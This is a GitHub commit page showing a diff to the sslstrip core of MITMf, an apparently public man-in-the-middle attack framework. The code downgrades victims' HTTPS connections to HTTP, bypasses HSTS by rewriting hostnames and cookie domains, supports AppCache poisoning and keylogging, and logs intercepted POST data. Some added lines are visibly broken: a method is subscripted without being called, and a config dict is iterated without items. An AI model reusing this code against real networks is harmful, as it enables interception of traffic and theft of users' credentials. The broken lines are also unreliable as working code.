github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-08-14 18:57:34 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

initial dynamic config support

Browse source 
added configwatcher.py
This commit is contained in:
byt3bl33d3r 2015-04-19 23:32:52 +02:00
commit 663f38e732
26 changed files with 1187 additions and 281 deletions
Download patch file Download diff file Expand all files Collapse all files

20
core/sslstrip/ClientRequest.py
View file

@ -49,17 +49,15 @@ class ClientRequest(Request):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.hsts = URLMonitor.getInstance().hsts
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
self.plugins = ProxyPlugins.getInstance()
#self.uniqueId = random.randint(0, 10000)
#Use are own DNS server instead of reactor.resolve()
self.resolver = URLMonitor.getInstance().getResolver()
self.customResolver = dns.resolver.Resolver()
self.customResolver.nameservers = ['127.0.0.1']
self.customResolver.port = URLMonitor.getInstance().getResolverPort()
def cleanHeaders(self):
headers = self.getAllHeaders().copy()
@ -70,7 +68,7 @@ class ClientRequest(Request):
if self.hsts:
if 'referer' in headers:
real = self.urlMonitor.real
real = self.urlMonitor.getHstsConfig()[0]
if len(real) > 0:
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
@ -133,7 +131,7 @@ class ClientRequest(Request):
if self.hsts:
host = self.urlMonitor.URLgetRealHost(str(host))
real = self.urlMonitor.real
real = self.urlMonitor.getHstsConfig()[0]
patchDict = self.urlMonitor.patchDict
url = 'http://' + host + path
self.uri = url # set URI to absolute
@ -179,7 +177,7 @@ class ClientRequest(Request):
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
def handleHostResolvedError(self, error):
mitmf_logger.debug("[ClientRequest] Host resolution error: " + str(error))
mitmf_logger.debug("[ClientRequest] Host resolution error: {}".format(error))
try:
self.finish()
except:
@ -195,16 +193,20 @@ class ClientRequest(Request):
mitmf_logger.debug("[ClientRequest] Host not cached.")
if self.resolver == 'dnschef':
if self.urlMonitor.getResolver() == 'dnschef':
self.customResolver.port = self.urlMonitor.getResolverPort()
try:
mitmf_logger.debug("[ClientRequest] Resolving with DNSChef")
address = str(self.customResolver.query(host)[0].address)
return defer.succeed(address)
except Exception:
mitmf_logger.debug("[ClientRequest] Exception occured, falling back to reactor.resolve()")
mitmf_logger.debug("[ClientRequest] Exception occured, falling back to Twisted")
return reactor.resolve(host)
elif self.resolver == 'twisted':
elif self.urlMonitor.getResolver() == 'twisted':
mitmf_logger.debug("[ClientRequest] Resolving with Twisted")
return reactor.resolve(host)
def process(self):

12
core/sslstrip/SSLServerConnection.py
View file

@ -40,7 +40,7 @@ class SSLServerConnection(ServerConnection):
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.hsts = URLMonitor.getInstance().hsts
def getLogLevel(self):
return logging.INFO
@ -58,7 +58,7 @@ class SSLServerConnection(ServerConnection):
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
mitmf_logger.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.sustitucion
real = self.urlMonitor.getHstsConfig()[1]
if dominio in real:
v=" Domain=%s"%real[dominio]
mitmf_logger.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v)
@ -85,13 +85,13 @@ class SSLServerConnection(ServerConnection):
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
mitmf_logger.debug("Found path-relative link in secure transmission: " + link)
mitmf_logger.debug("New Absolute path-relative link: " + absoluteLink)
mitmf_logger.debug("[SSLServerConnection] Found path-relative link in secure transmission: " + link)
mitmf_logger.debug("[SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
mitmf_logger.debug("Found relative link in secure transmission: " + link)
mitmf_logger.debug("New Absolute link: " + absoluteLink)
mitmf_logger.debug("[SSLServerConnection] Found relative link in secure transmission: " + link)
mitmf_logger.debug("[SSLServerConnection] New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&', '&')

10
core/sslstrip/ServerConnection.py
View file

@ -55,8 +55,8 @@ class ServerConnection(HTTPClient):
self.client = client
self.clientInfo = None
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.app = URLMonitor.getInstance().isAppCachePoisoning()
self.hsts = URLMonitor.getInstance().hsts
self.app = URLMonitor.getInstance().app
self.plugins = ProxyPlugins.getInstance()
self.isImageRequest = False
self.isCompressed = False
@ -70,7 +70,7 @@ class ServerConnection(HTTPClient):
if self.command == 'GET':
try:
user_agent = parse(self.headers['user-agent'])
self.clientInfo = "{0} [type:{1}-{2} os:{3}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
self.clientInfo = "{} [type:{}-{} os:{}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
except:
self.clientInfo = "{} ".format(self.client.getClientIP())
@ -93,7 +93,7 @@ class ServerConnection(HTTPClient):
elif 'keylog' in self.uri:
self.plugins.hook()
else:
mitmf_logger.warning("{0} {1} Data ({2}):\n{3}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
self.transport.write(self.postData)
def connectionMade(self):
@ -106,7 +106,7 @@ class ServerConnection(HTTPClient):
self.sendPostData()
def handleStatus(self, version, code, message):
mitmf_logger.debug("[ServerConnection] Server response: {0} {1} {2}".format(version, code, message))
mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):

4
core/sslstrip/ServerConnectionFactory.py
View file

@ -34,12 +34,12 @@ class ServerConnectionFactory(ClientFactory):
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
def clientConnectionFailed(self, connector, reason):
mitmf_logger.debug("Server connection failed.")
mitmf_logger.debug("[ServerConnectionFactory] Server connection failed.")
destination = connector.getDestination()
if (destination.port != 443):
mitmf_logger.debug("Retrying via SSL")
mitmf_logger.debug("[ServerConnectionFactory] Retrying via SSL")
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
else:
try:

75
core/sslstrip/URLMonitor.py
View file

@ -18,6 +18,7 @@
import re, os
import logging
from core.ConfigWatcher import ConfigWatcher
mitmf_logger = logging.getLogger('mimtf')
@ -31,8 +32,6 @@ class URLMonitor:
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = {} # LEO: diccionario host / sustitucion
real = {} # LEO: diccionario host / real
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
@ -46,9 +45,6 @@ class URLMonitor:
self.faviconReplacement = False
self.hsts = False
self.app = False
self.hsts_config = None
self.resolver = 'dnschef'
self.resolverport = 53
@staticmethod
def getInstance():
@ -57,21 +53,13 @@ class URLMonitor:
return URLMonitor._instance
#This is here because I'm lazy
def setResolver(self, resolver):
self.resolver = str(resolver).lower()
#This is here because I'm lazy
def getResolver(self):
return self.resolver
#This is here because I'm lazy
def setResolverPort(self, port):
self.resolverport = int(port)
return ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['resolver'].lower()
#This is here because I'm lazy
def getResolverPort(self):
return self.resolverport
return int(ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['port'])
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
@ -92,7 +80,7 @@ class URLMonitor:
s.add(to_url)
return
url_set = set([from_url, to_url])
mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: %s" % url_set)
mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: {}".format(url_set))
self.redirects.append(url_set)
def getRedirectionSet(self, url):
@ -123,15 +111,15 @@ class URLMonitor:
port = 443
if self.hsts:
if not self.sustitucion.has_key(host):
if not self.getHstsConfig[1].has_key(host):
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
self.getHstsConfig[1][host] = "w"+host
self.getHstsConfig[0]["w"+host] = host
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
mitmf_logger.debug("[URLMonitor][HSTS] SSL host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
self.getHstsConfig[1][host] = "web"+host
self.getHstsConfig[0]["web"+host] = host
mitmf_logger.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.getHstsConfig[1][host]))
url = 'http://' + host + path
#mitmf_logger.debug("HSTS stripped URL: %s %s"%(client, url))
@ -139,7 +127,7 @@ class URLMonitor:
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+ self.sustitucion[host] + path
return 'http://'+ self.getHstsConfig[1][host] + path
else:
url = method + host + path
@ -150,40 +138,35 @@ class URLMonitor:
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def setHstsBypass(self, hstsconfig):
self.hsts = True
self.hsts_config = hstsconfig
def getHstsConfig(self):
sustitucion = dict()
real = dict()
for k,v in self.hsts_config.iteritems():
self.sustitucion[k] = v
self.real[v] = k
for k,v in ConfigWatcher.getInstance().getConfig()['SSLstrip+']:
sustitucion[k] = v
real[v] = k
return (real, sustitucion)
def setHstsBypass(self):
self.hsts = True
def setAppCachePoisoning(self):
self.app = True
def setClientLogging(self, clientLogging):
self.clientLogging = clientLogging
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isClientLogging(self):
return self.clientLogging
def isHstsBypass(self):
return self.hsts
def isAppCachePoisoning(self):
return self.app
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self, host):
mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: %s"% host)
if self.real.has_key(host):
mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: %s"% self.real[host])
return self.real[host]
mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: {}".format(host))
if self.getHstsConfig()[0].has_key(host):
mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.getHstsConfig()[0][host]))
return self.getHstsConfig()[0][host]
else:
mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: %s"% host)
mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: {}".format(host))
return host